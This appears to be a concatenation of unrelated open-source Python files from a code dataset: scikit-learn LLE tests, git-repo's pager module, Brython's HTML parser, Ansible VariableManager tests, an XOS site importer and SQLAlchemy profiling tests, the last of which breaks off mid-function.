assert_array_almost_equal(np.sum(A.toarray(), 1), np.ones(3))
pred = np.dot(A.toarray(), X)
assert_less(linalg.norm(pred - X) / X.shape[0], 1)
#----------------------------------------------------------------------
# Test LLE by computing the reconstruction error on some manifolds.
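# The reconstruction error used below is ||N X - X||_F, where N holds the
# barycenter weights: it measures how well each sample is re-expressed as a
# weighted combination of its nearest neighbors.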
def test_lle_simple_grid():
# note: ARPACK is numerically unstable, so this test will fail for
# some random seeds. We choose 2 because the tests pass.
rng = np.random.RandomState(2)
tol = 0.1
# grid of equidistant points in 2D, n_components = n_dim
X = np.array(list(product(range(5), repeat=2)))
X = X + 1e-10 * rng.uniform(size=X.shape)
n_components = 2
clf = manifold.LocallyLinearEmbedding(n_neighbors=5,
n_components=n_components,
random_state=rng)
tol = 0.1
N = barycenter_kneighbors_graph(X, clf.n_neighbors).toarray()
reconstruction_error = linalg.norm(np.dot(N, X) - X, 'fro')
assert_less(reconstruction_error, tol)
for solver in eigen_solvers:
clf.set_params(eigen_solver=solver)
clf.fit(X)
assert_true(clf.embedding_.shape[1] == n_components)
reconstruction_error = linalg.norm(
np.dot(N, clf.embedding_) - clf.embedding_, 'fro') ** 2
assert_less(reconstruction_error, tol)
assert_almost_equal(clf.reconstruction_error_,
reconstruction_error, decimal=1)
# re-embed a noisy version of X using the transform method
noise = rng.randn(*X.shape) / 100
X_reembedded = clf.transform(X + noise)
assert_less(linalg.norm(X_reembedded - clf.embedding_), tol)
def test_lle_manifold():
rng = np.random.RandomState(0)
# similar test on a slightly more complex manifold
X = np.array(list(product(np.arange(18), repeat=2)))
X = np.c_[X, X[:, 0] ** 2 / 18]
X = X + 1e-10 * rng.uniform(size=X.shape)
n_components = 2
for method in ["standard", "hessian", "modified", "ltsa"]:
clf = manifold.LocallyLinearEmbedding(n_neighbors=6,
n_components=n_components,
method=method, random_state=0)
tol = 1.5 if method == "standard" else 3
N = barycenter_kneighbors_graph(X, clf.n_neighbors).toarray()
reconstruction_error = linalg.norm(np.dot(N, X) - X)
assert_less(reconstruction_error, tol)
for solver in eigen_solvers:
clf.set_params(eigen_solver=solver)
clf.fit(X)
assert_true(clf.embedding_.shape[1] == n_components)
reconstruction_error = linalg.norm(
np.dot(N, clf.embedding_) - clf.embedding_, 'fro') ** 2
details = ("solver: %s, method: %s" % (solver, method))
assert_less(reconstruction_error, tol, msg=details)
assert_less(np.abs(clf.reconstruction_error_ -
reconstruction_error),
tol * reconstruction_error, msg=details)
def test_pipeline():
# check that LocallyLinearEmbedding works fine as a Pipeline
# only checks that no error is raised.
# TODO check that it actually does something useful
from sklearn import pipeline, datasets
X, y = datasets.make_blobs(random_state=0)
clf = pipeline.Pipeline(
[('filter', manifold.LocallyLinearEmbedding(random_state=0)),
('clf', neighbors.KNeighborsClassifier())])
clf.fit(X, y)
assert_less(.9, clf.score(X, y))
# Test the error raised when the weight matrix is singular
def test_singular_matrix():
from nose.tools import assert_raises
M = np.ones((10, 3))
f = ignore_warnings
assert_raises(ValueError, f(manifold.locally_linear_embedding),
M, 2, 1, method='standard', eigen_solver='arpack')
if __name__ == '__main__':
import nose
nose.runmodule()
| bsd-3-clause |
finik/git-repo | pager.py | 86 | 2051 | #
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import select
import sys
active = False
def RunPager(globalConfig):
global active
if not os.isatty(0) or not os.isatty(1):
return
pager = _SelectPager(globalConfig)
if pager == '' or pager == 'cat':
return
# This process turns into the pager; a child it forks will
# do the real processing and output back to the pager. This
# is necessary to keep the pager in control of the tty.
#
try:
r, w = os.pipe()
pid = os.fork()
if not pid:
os.dup2(w, 1)
os.dup2(w, 2)
os.close(r)
os.close(w)
active = True
return
os.dup2(r, 0)
os.close(r)
os.close(w)
_BecomePager(pager)
except Exception:
print("fatal: cannot start pager '%s'" % pager, file=sys.stderr)
sys.exit(255)
def _SelectPager(globalConfig):
try:
return os.environ['GIT_PAGER']
except KeyError:
pass
pager = globalConfig.GetString('core.pager')
if pager:
return pager
try:
return os.environ['PAGER']
except KeyError:
pass
return 'less'
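# _SelectPager resolves the pager in order: $GIT_PAGER, the git
# 'core.pager' config value, then $PAGER, falling back to 'less'.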
def _BecomePager(pager):
# Delaying execution of the pager until we have output
# ready works around a long-standing bug in popularly
# available versions of 'less', a better 'more'.
#
_a, _b, _c = select.select([0], [], [0])
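  # LESS flags: F quits if the output fits on one screen, R passes raw
  # control characters (keeps colors), S chops long lines, X skips termcap
  # init/deinit so the screen is not cleared on exit.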
os.environ['LESS'] = 'FRSX'
try:
os.execvp(pager, [pager])
except OSError:
os.execv('/bin/sh', ['sh', '-c', pager])
| apache-2.0 |
40223119/2015cda | static/Brython3.1.1-20150328-091302/Lib/html/parser.py | 737 | 19605 | """A parser for HTML and XHTML."""
# This file is based on sgmllib.py, but the API is slightly different.
# XXX There should be a way to distinguish between PCDATA (parsed
# character data -- the normal case), RCDATA (replaceable character
# data -- only char and entity references and end tags are special)
# and CDATA (character data -- only end tags are special).
import _markupbase
import re
import warnings
# Regular expressions used for parsing
interesting_normal = re.compile('[&<]')
incomplete = re.compile('&[a-zA-Z#]')
entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')
charref = re.compile('&#(?:[0-9]+|[xX][0-9a-fA-F]+)[^0-9a-fA-F]')
starttagopen = re.compile('<[a-zA-Z]')
piclose = re.compile('>')
commentclose = re.compile(r'--\s*>')
tagfind = re.compile('([a-zA-Z][-.a-zA-Z0-9:_]*)(?:\s|/(?!>))*')
# see http://www.w3.org/TR/html5/tokenization.html#tag-open-state
# and http://www.w3.org/TR/html5/tokenization.html#tag-name-state
tagfind_tolerant = re.compile('[a-zA-Z][^\t\n\r\f />\x00]*')
# Note:
# 1) the strict attrfind isn't really strict, but we can't make it
# correctly strict without breaking backward compatibility;
# 2) if you change attrfind remember to update locatestarttagend too;
# 3) if you change attrfind and/or locatestarttagend the parser will
# explode, so don't do it.
attrfind = re.compile(
r'\s*([a-zA-Z_][-.:a-zA-Z_0-9]*)(\s*=\s*'
r'(\'[^\']*\'|"[^"]*"|[^\s"\'=<>`]*))?')
attrfind_tolerant = re.compile(
r'((?<=[\'"\s/])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?(?:\s|/(?!>))*')
locatestarttagend = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:\s+ # whitespace before attribute name
(?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
(?:\s*=\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|\"[^\"]*\" # LIT-enclosed value
|[^'\">\s]+ # bare value
)
)?
)
)*
\s* # trailing whitespace
""", re.VERBOSE)
locatestarttagend_tolerant = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:[\s/]* # optional whitespace before attribute name
(?:(?<=['"\s/])[^\s/>][^\s/=>]* # attribute name
(?:\s*=+\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|"[^"]*" # LIT-enclosed value
|(?!['"])[^>\s]* # bare value
)
(?:\s*,)* # possibly followed by a comma
)?(?:\s|/(?!>))*
)*
)?
\s* # trailing whitespace
""", re.VERBOSE)
endendtag = re.compile('>')
# the HTML 5 spec, section 8.1.2.2, doesn't allow spaces between
# </ and the tag name, so maybe this should be fixed
endtagfind = re.compile('</\s*([a-zA-Z][-.a-zA-Z0-9:_]*)\s*>')
class HTMLParseError(Exception):
"""Exception raised for all parse errors."""
def __init__(self, msg, position=(None, None)):
assert msg
self.msg = msg
self.lineno = position[0]
self.offset = position[1]
def __str__(self):
result = self.msg
if self.lineno is not None:
result = result + ", at line %d" % self.lineno
if self.offset is not None:
result = result + ", column %d" % (self.offset + 1)
return result
class HTMLParser(_markupbase.ParserBase):
"""Find tags and other markup and call handler functions.
Usage:
p = HTMLParser()
p.feed(data)
...
p.close()
Start tags are handled by calling self.handle_starttag() or
self.handle_startendtag(); end tags by self.handle_endtag(). The
data between tags is passed from the parser to the derived class
by calling self.handle_data() with the data as argument (the data
may be split up in arbitrary chunks). Entity references are
passed by calling self.handle_entityref() with the entity
reference as the argument. Numeric character references are
passed to self.handle_charref() with the string containing the
reference as the argument.
"""
CDATA_CONTENT_ELEMENTS = ("script", "style")
def __init__(self, strict=False):
"""Initialize and reset this instance.
If strict is set to False (the default) the parser will parse invalid
markup, otherwise it will raise an error. Note that the strict mode
is deprecated.
"""
if strict:
warnings.warn("The strict mode is deprecated.",
DeprecationWarning, stacklevel=2)
self.strict = strict
self.reset()
def reset(self):
"""Reset this instance. Loses all unprocessed data."""
self.rawdata = ''
self.lasttag = '???'
self.interesting = interesting_normal
self.cdata_elem = None
_markupbase.ParserBase.reset(self)
def feed(self, data):
r"""Feed data to the parser.
Call this as often as you want, with as little or as much text
as you want (may include '\n').
"""
self.rawdata = self.rawdata + data
self.goahead(0)
def close(self):
"""Handle any buffered data."""
self.goahead(1)
def error(self, message):
raise HTMLParseError(message, self.getpos())
__starttag_text = None
def get_starttag_text(self):
"""Return full source of start tag: '<...>'."""
return self.__starttag_text
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
def clear_cdata_mode(self):
self.interesting = interesting_normal
self.cdata_elem = None
# Internal -- handle data as far as reasonable. May leave state
# and data to be processed by a subsequent call. If 'end' is
# true, force handling all data as if followed by EOF marker.
def goahead(self, end):
rawdata = self.rawdata
i = 0
n = len(rawdata)
while i < n:
match = self.interesting.search(rawdata, i) # < or &
if match:
j = match.start()
else:
if self.cdata_elem:
break
j = n
if i < j: self.handle_data(rawdata[i:j])
i = self.updatepos(i, j)
if i == n: break
startswith = rawdata.startswith
if startswith('<', i):
if starttagopen.match(rawdata, i): # < + letter
k = self.parse_starttag(i)
elif startswith("</", i):
k = self.parse_endtag(i)
elif startswith("<!--", i):
k = self.parse_comment(i)
elif startswith("<?", i):
k = self.parse_pi(i)
elif startswith("<!", i):
if self.strict:
k = self.parse_declaration(i)
else:
k = self.parse_html_declaration(i)
elif (i + 1) < n:
self.handle_data("<")
k = i + 1
else:
break
if k < 0:
if not end:
break
if self.strict:
self.error("EOF in middle of construct")
k = rawdata.find('>', i + 1)
if k < 0:
k = rawdata.find('<', i + 1)
if k < 0:
k = i + 1
else:
k += 1
self.handle_data(rawdata[i:k])
i = self.updatepos(i, k)
elif startswith("&#", i):
match = charref.match(rawdata, i)
if match:
name = match.group()[2:-1]
self.handle_charref(name)
k = match.end()
if not startswith(';', k-1):
k = k - 1
i = self.updatepos(i, k)
continue
else:
if ";" in rawdata[i:]: #bail by consuming &#
self.handle_data(rawdata[0:2])
i = self.updatepos(i, 2)
break
elif startswith('&', i):
match = entityref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_entityref(name)
k = match.end()
if not startswith(';', k-1):
k = k - 1
i = self.updatepos(i, k)
continue
match = incomplete.match(rawdata, i)
if match:
# match.group() will contain at least 2 chars
if end and match.group() == rawdata[i:]:
if self.strict:
self.error("EOF in middle of entity or char ref")
else:
k = match.end()
if k <= i:
k = n
i = self.updatepos(i, i + 1)
# incomplete
break
elif (i + 1) < n:
# not the end of the buffer, and can't be confused
# with some other construct
self.handle_data("&")
i = self.updatepos(i, i + 1)
else:
break
else:
assert 0, "interesting.search() lied"
# end while
if end and i < n and not self.cdata_elem:
self.handle_data(rawdata[i:n])
i = self.updatepos(i, n)
self.rawdata = rawdata[i:]
# Internal -- parse html declarations, return length or -1 if not terminated
# See w3.org/TR/html5/tokenization.html#markup-declaration-open-state
# See also parse_declaration in _markupbase
def parse_html_declaration(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == '<!', ('unexpected call to '
'parse_html_declaration()')
if rawdata[i:i+4] == '<!--':
# this case is actually already handled in goahead()
return self.parse_comment(i)
elif rawdata[i:i+3] == '<![':
return self.parse_marked_section(i)
elif rawdata[i:i+9].lower() == '<!doctype':
# find the closing >
gtpos = rawdata.find('>', i+9)
if gtpos == -1:
return -1
self.handle_decl(rawdata[i+2:gtpos])
return gtpos+1
else:
return self.parse_bogus_comment(i)
# Internal -- parse bogus comment, return length or -1 if not terminated
# see http://www.w3.org/TR/html5/tokenization.html#bogus-comment-state
def parse_bogus_comment(self, i, report=1):
rawdata = self.rawdata
assert rawdata[i:i+2] in ('<!', '</'), ('unexpected call to '
'parse_comment()')
pos = rawdata.find('>', i+2)
if pos == -1:
return -1
if report:
self.handle_comment(rawdata[i+2:pos])
return pos + 1
# Internal -- parse processing instr, return end or -1 if not terminated
def parse_pi(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == '<?', 'unexpected call to parse_pi()'
match = piclose.search(rawdata, i+2) # >
if not match:
return -1
j = match.start()
self.handle_pi(rawdata[i+2: j])
j = match.end()
return j
# Internal -- handle starttag, return end or -1 if not terminated
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = match.group(1).lower()
while k < endpos:
if self.strict:
m = attrfind.match(rawdata, k)
else:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = self.unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
if self.strict:
self.error("junk characters in start tag: %r"
% (rawdata[k:endpos][:20],))
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
# Internal -- check to see if we have a complete starttag; return end
# or -1 if incomplete.
def check_for_whole_start_tag(self, i):
rawdata = self.rawdata
if self.strict:
m = locatestarttagend.match(rawdata, i)
else:
m = locatestarttagend_tolerant.match(rawdata, i)
if m:
j = m.end()
next = rawdata[j:j+1]
if next == ">":
return j + 1
if next == "/":
if rawdata.startswith("/>", j):
return j + 2
if rawdata.startswith("/", j):
# buffer boundary
return -1
# else bogus input
if self.strict:
self.updatepos(i, j + 1)
self.error("malformed empty start tag")
if j > i:
return j
else:
return i + 1
if next == "":
# end of input
return -1
if next in ("abcdefghijklmnopqrstuvwxyz=/"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
# end of input in or before attribute value, or we have the
# '/' from a '/>' ending
return -1
if self.strict:
self.updatepos(i, j)
self.error("malformed start tag")
if j > i:
return j
else:
return i + 1
raise AssertionError("we should not get here!")
# Internal -- parse endtag, return end or -1 if incomplete
def parse_endtag(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == "</", "unexpected call to parse_endtag"
match = endendtag.search(rawdata, i+1) # >
if not match:
return -1
gtpos = match.end()
match = endtagfind.match(rawdata, i) # </ + tag + >
if not match:
if self.cdata_elem is not None:
self.handle_data(rawdata[i:gtpos])
return gtpos
if self.strict:
self.error("bad end tag: %r" % (rawdata[i:gtpos],))
# find the name: w3.org/TR/html5/tokenization.html#tag-name-state
namematch = tagfind_tolerant.match(rawdata, i+2)
if not namematch:
# w3.org/TR/html5/tokenization.html#end-tag-open-state
if rawdata[i:i+3] == '</>':
return i+3
else:
return self.parse_bogus_comment(i)
tagname = namematch.group().lower()
# consume and ignore other stuff between the name and the >
# Note: this is not 100% correct, since we might have things like
        # </tag attr=">">, but looking for > after the name should cover
# most of the cases and is much simpler
gtpos = rawdata.find('>', namematch.end())
self.handle_endtag(tagname)
return gtpos+1
elem = match.group(1).lower() # script or style
if self.cdata_elem is not None:
if elem != self.cdata_elem:
self.handle_data(rawdata[i:gtpos])
return gtpos
self.handle_endtag(elem.lower())
self.clear_cdata_mode()
return gtpos
# Overridable -- finish processing of start+end tag: <tag.../>
def handle_startendtag(self, tag, attrs):
self.handle_starttag(tag, attrs)
self.handle_endtag(tag)
# Overridable -- handle start tag
def handle_starttag(self, tag, attrs):
pass
# Overridable -- handle end tag
def handle_endtag(self, tag):
pass
# Overridable -- handle character reference
def handle_charref(self, name):
pass
# Overridable -- handle entity reference
def handle_entityref(self, name):
pass
# Overridable -- handle data
def handle_data(self, data):
pass
# Overridable -- handle comment
def handle_comment(self, data):
pass
# Overridable -- handle declaration
def handle_decl(self, decl):
pass
# Overridable -- handle processing instruction
def handle_pi(self, data):
pass
def unknown_decl(self, data):
if self.strict:
self.error("unknown declaration: %r" % (data,))
# Internal -- helper to remove special character quoting
def unescape(self, s):
if '&' not in s:
return s
def replaceEntities(s):
s = s.groups()[0]
try:
if s[0] == "#":
s = s[1:]
if s[0] in ['x','X']:
c = int(s[1:].rstrip(';'), 16)
else:
c = int(s.rstrip(';'))
return chr(c)
except ValueError:
return '&#' + s
else:
from html.entities import html5
if s in html5:
return html5[s]
elif s.endswith(';'):
return '&' + s
for x in range(2, len(s)):
if s[:x] in html5:
return html5[s[:x]] + s[x:]
else:
return '&' + s
return re.sub(r"&(#?[xX]?(?:[0-9a-fA-F]+;|\w{1,32};?))",
replaceEntities, s, flags=re.ASCII)
| gpl-3.0 |
schlueter/ansible | test/units/vars/test_variable_manager.py | 73 | 11541 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from collections import defaultdict
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import MagicMock, mock_open, patch
from ansible.inventory.manager import InventoryManager
from ansible.module_utils.six import iteritems
from ansible.module_utils.six.moves import builtins
from ansible.playbook.play import Play
from units.mock.loader import DictDataLoader
from units.mock.path import mock_unfrackpath_noop
from ansible.vars.manager import VariableManager
class TestVariableManager(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_basic_manager(self):
fake_loader = DictDataLoader({})
mock_inventory = MagicMock()
v = VariableManager(loader=fake_loader, inventory=mock_inventory)
variables = v.get_vars(use_cache=False)
# Check var manager expected values, never check: ['omit', 'vars']
# FIXME: add the following ['ansible_version', 'ansible_playbook_python', 'groups']
for varname, value in (('playbook_dir', os.path.abspath('.')), ):
self.assertEqual(variables[varname], value)
def test_variable_manager_extra_vars(self):
fake_loader = DictDataLoader({})
extra_vars = dict(a=1, b=2, c=3)
mock_inventory = MagicMock()
v = VariableManager(loader=fake_loader, inventory=mock_inventory)
v.extra_vars = extra_vars
vars = v.get_vars(use_cache=False)
for (key, val) in iteritems(extra_vars):
self.assertEqual(vars.get(key), val)
self.assertIsNot(v.extra_vars, extra_vars)
def test_variable_manager_play_vars(self):
fake_loader = DictDataLoader({})
mock_play = MagicMock()
mock_play.get_vars.return_value = dict(foo="bar")
mock_play.get_roles.return_value = []
mock_play.get_vars_files.return_value = []
mock_inventory = MagicMock()
v = VariableManager(loader=fake_loader, inventory=mock_inventory)
self.assertEqual(v.get_vars(play=mock_play, use_cache=False).get("foo"), "bar")
def test_variable_manager_play_vars_files(self):
fake_loader = DictDataLoader({
__file__: """
foo: bar
"""
})
mock_play = MagicMock()
mock_play.get_vars.return_value = dict()
mock_play.get_roles.return_value = []
mock_play.get_vars_files.return_value = [__file__]
mock_inventory = MagicMock()
v = VariableManager(inventory=mock_inventory, loader=fake_loader)
self.assertEqual(v.get_vars(play=mock_play, use_cache=False).get("foo"), "bar")
def test_variable_manager_task_vars(self):
# FIXME: BCS make this work
return
# pylint: disable=unreachable
fake_loader = DictDataLoader({})
mock_task = MagicMock()
mock_task._role = None
mock_task.loop = None
mock_task.get_vars.return_value = dict(foo="bar")
mock_task.get_include_params.return_value = dict()
mock_all = MagicMock()
mock_all.get_vars.return_value = {}
mock_all.get_file_vars.return_value = {}
mock_host = MagicMock()
mock_host.get.name.return_value = 'test01'
mock_host.get_vars.return_value = {}
mock_host.get_host_vars.return_value = {}
mock_inventory = MagicMock()
mock_inventory.hosts.get.return_value = mock_host
mock_inventory.hosts.get.name.return_value = 'test01'
mock_inventory.get_host.return_value = mock_host
mock_inventory.groups.__getitem__.return_value = mock_all
v = VariableManager(loader=fake_loader, inventory=mock_inventory)
self.assertEqual(v.get_vars(task=mock_task, use_cache=False).get("foo"), "bar")
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_variable_manager_precedence(self):
# FIXME: this needs to be redone as dataloader is not the automatic source of data anymore
return
# pylint: disable=unreachable
'''
Tests complex variations and combinations of get_vars() with different
objects to modify the context under which variables are merged.
'''
# FIXME: BCS makethiswork
# return True
mock_inventory = MagicMock()
inventory1_filedata = """
[group2:children]
group1
[group1]
host1 host_var=host_var_from_inventory_host1
[group1:vars]
group_var = group_var_from_inventory_group1
[group2:vars]
group_var = group_var_from_inventory_group2
"""
fake_loader = DictDataLoader({
# inventory1
'/etc/ansible/inventory1': inventory1_filedata,
# role defaults_only1
'/etc/ansible/roles/defaults_only1/defaults/main.yml': """
default_var: "default_var_from_defaults_only1"
host_var: "host_var_from_defaults_only1"
group_var: "group_var_from_defaults_only1"
group_var_all: "group_var_all_from_defaults_only1"
extra_var: "extra_var_from_defaults_only1"
""",
'/etc/ansible/roles/defaults_only1/tasks/main.yml': """
- debug: msg="here i am"
""",
# role defaults_only2
'/etc/ansible/roles/defaults_only2/defaults/main.yml': """
default_var: "default_var_from_defaults_only2"
host_var: "host_var_from_defaults_only2"
group_var: "group_var_from_defaults_only2"
group_var_all: "group_var_all_from_defaults_only2"
extra_var: "extra_var_from_defaults_only2"
""",
})
inv1 = InventoryManager(loader=fake_loader, sources=['/etc/ansible/inventory1'])
v = VariableManager(inventory=mock_inventory, loader=fake_loader)
v._fact_cache = defaultdict(dict)
play1 = Play.load(dict(
hosts=['all'],
roles=['defaults_only1', 'defaults_only2'],
), loader=fake_loader, variable_manager=v)
# first we assert that the defaults as viewed as a whole are the merged results
# of the defaults from each role, with the last role defined "winning" when
# there is a variable naming conflict
res = v.get_vars(play=play1)
self.assertEqual(res['default_var'], 'default_var_from_defaults_only2')
# next, we assert that when vars are viewed from the context of a task within a
# role, that task will see its own role defaults before any other role's
blocks = play1.compile()
task = blocks[1].block[0]
res = v.get_vars(play=play1, task=task)
self.assertEqual(res['default_var'], 'default_var_from_defaults_only1')
# next we assert the precedence of inventory variables
v.set_inventory(inv1)
h1 = inv1.get_host('host1')
res = v.get_vars(play=play1, host=h1)
self.assertEqual(res['group_var'], 'group_var_from_inventory_group1')
self.assertEqual(res['host_var'], 'host_var_from_inventory_host1')
# next we test with group_vars/ files loaded
fake_loader.push("/etc/ansible/group_vars/all", """
group_var_all: group_var_all_from_group_vars_all
""")
fake_loader.push("/etc/ansible/group_vars/group1", """
group_var: group_var_from_group_vars_group1
""")
fake_loader.push("/etc/ansible/group_vars/group3", """
# this is a dummy, which should not be used anywhere
group_var: group_var_from_group_vars_group3
""")
fake_loader.push("/etc/ansible/host_vars/host1", """
host_var: host_var_from_host_vars_host1
""")
fake_loader.push("group_vars/group1", """
playbook_group_var: playbook_group_var
""")
fake_loader.push("host_vars/host1", """
playbook_host_var: playbook_host_var
""")
res = v.get_vars(play=play1, host=h1)
# self.assertEqual(res['group_var'], 'group_var_from_group_vars_group1')
# self.assertEqual(res['group_var_all'], 'group_var_all_from_group_vars_all')
# self.assertEqual(res['playbook_group_var'], 'playbook_group_var')
# self.assertEqual(res['host_var'], 'host_var_from_host_vars_host1')
# self.assertEqual(res['playbook_host_var'], 'playbook_host_var')
# add in the fact cache
v._fact_cache['host1'] = dict(fact_cache_var="fact_cache_var_from_fact_cache")
res = v.get_vars(play=play1, host=h1)
self.assertEqual(res['fact_cache_var'], 'fact_cache_var_from_fact_cache')
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_variable_manager_role_vars_dependencies(self):
'''
Tests vars from role dependencies with duplicate dependencies.
'''
mock_inventory = MagicMock()
fake_loader = DictDataLoader({
# role common-role
'/etc/ansible/roles/common-role/tasks/main.yml': """
- debug: msg="{{role_var}}"
""",
# We do not need allow_duplicates: yes for this role
# because eliminating duplicates is done by the execution
# strategy, which we do not test here.
# role role1
'/etc/ansible/roles/role1/vars/main.yml': """
role_var: "role_var_from_role1"
""",
'/etc/ansible/roles/role1/meta/main.yml': """
dependencies:
- { role: common-role }
""",
# role role2
'/etc/ansible/roles/role2/vars/main.yml': """
role_var: "role_var_from_role2"
""",
'/etc/ansible/roles/role2/meta/main.yml': """
dependencies:
- { role: common-role }
""",
})
v = VariableManager(loader=fake_loader, inventory=mock_inventory)
v._fact_cache = defaultdict(dict)
play1 = Play.load(dict(
hosts=['all'],
roles=['role1', 'role2'],
), loader=fake_loader, variable_manager=v)
# The task defined by common-role exists twice because role1
# and role2 depend on common-role. Check that the tasks see
# different values of role_var.
blocks = play1.compile()
task = blocks[1].block[0]
res = v.get_vars(play=play1, task=task)
self.assertEqual(res['role_var'], 'role_var_from_role1')
task = blocks[2].block[0]
res = v.get_vars(play=play1, task=task)
self.assertEqual(res['role_var'], 'role_var_from_role2')
| gpl-3.0 |
wathsalav/xos | xos/importer/plclassic/site_importer.py | 1 | 1266 | from core.models import Site
class SiteImporter:
def __init__(self, api):
self.api = api
self.remote_sites = {}
self.local_sites = {}
def run(self):
db_sites = Site.objects.all()
for db_site in db_sites:
self.local_sites[db_site.login_base] = db_site
print "%s local sites" % len(db_sites)
sites = self.api.GetSites({'peer_id': None})
print "%s remote sites" % len(sites)
count = 0
for site in sites:
self.remote_sites[site['site_id']] = site
if site['login_base'] not in self.local_sites:
new_site = Site(name=site['name'],
login_base=site['login_base'],
site_url=site['url'],
enabled=site['enabled'],
longitude=site['longitude'],
latitude=site['latitude'],
is_public=site['is_public'],
abbreviated_name=site['abbreviated_name'])
new_site.save()
count += 1
self.local_sites[new_site.login_base] = new_site
print "imported %s sites" % count
| apache-2.0 |
bootandy/sqlalchemy | test/aaa_profiling/test_resultset.py | 23 | 4577 | from sqlalchemy import MetaData, Table, Column, String, Unicode, Integer, \
create_engine
from sqlalchemy.testing import fixtures, AssertsExecutionResults, profiling
from sqlalchemy import testing
from sqlalchemy.testing import eq_
from sqlalchemy.util import u
from sqlalchemy.engine.result import RowProxy
import sys
NUM_FIELDS = 10
NUM_RECORDS = 1000
t = t2 = metadata = None
class ResultSetTest(fixtures.TestBase, AssertsExecutionResults):
__backend__ = True
@classmethod
def setup_class(cls):
global t, t2, metadata
metadata = MetaData(testing.db)
t = Table('table', metadata, *[Column('field%d' % fnum, String(50))
for fnum in range(NUM_FIELDS)])
t2 = Table(
'table2', metadata, *
[Column('field%d' % fnum, Unicode(50))
for fnum in range(NUM_FIELDS)])
def setup(self):
metadata.create_all()
t.insert().execute([dict(('field%d' % fnum, u('value%d' % fnum))
for fnum in range(NUM_FIELDS)) for r_num in
range(NUM_RECORDS)])
t2.insert().execute([dict(('field%d' % fnum, u('value%d' % fnum))
for fnum in range(NUM_FIELDS)) for r_num in
range(NUM_RECORDS)])
# warm up type caches
t.select().execute().fetchall()
t2.select().execute().fetchall()
def teardown(self):
metadata.drop_all()
@profiling.function_call_count()
def test_string(self):
[tuple(row) for row in t.select().execute().fetchall()]
@profiling.function_call_count()
def test_unicode(self):
[tuple(row) for row in t2.select().execute().fetchall()]
def test_contains_doesnt_compile(self):
row = t.select().execute().first()
c1 = Column('some column', Integer) + \
Column("some other column", Integer)
@profiling.function_call_count()
def go():
c1 in row
go()
class ExecutionTest(fixtures.TestBase):
__backend__ = True
def test_minimal_connection_execute(self):
# create an engine without any instrumentation.
e = create_engine('sqlite://')
c = e.connect()
# ensure initial connect activities complete
c.execute("select 1")
@profiling.function_call_count()
def go():
c.execute("select 1")
go()
def test_minimal_engine_execute(self, variance=0.10):
# create an engine without any instrumentation.
e = create_engine('sqlite://')
# ensure initial connect activities complete
e.execute("select 1")
@profiling.function_call_count()
def go():
e.execute("select 1")
go()
class RowProxyTest(fixtures.TestBase):
__requires__ = 'cpython',
__backend__ = True
def _rowproxy_fixture(self, keys, processors, row):
class MockMeta(object):
def __init__(self):
pass
metadata = MockMeta()
keymap = {}
for index, (keyobjs, processor, values) in \
enumerate(list(zip(keys, processors, row))):
for key in keyobjs:
keymap[key] = (processor, key, index)
keymap[index] = (processor, key, index)
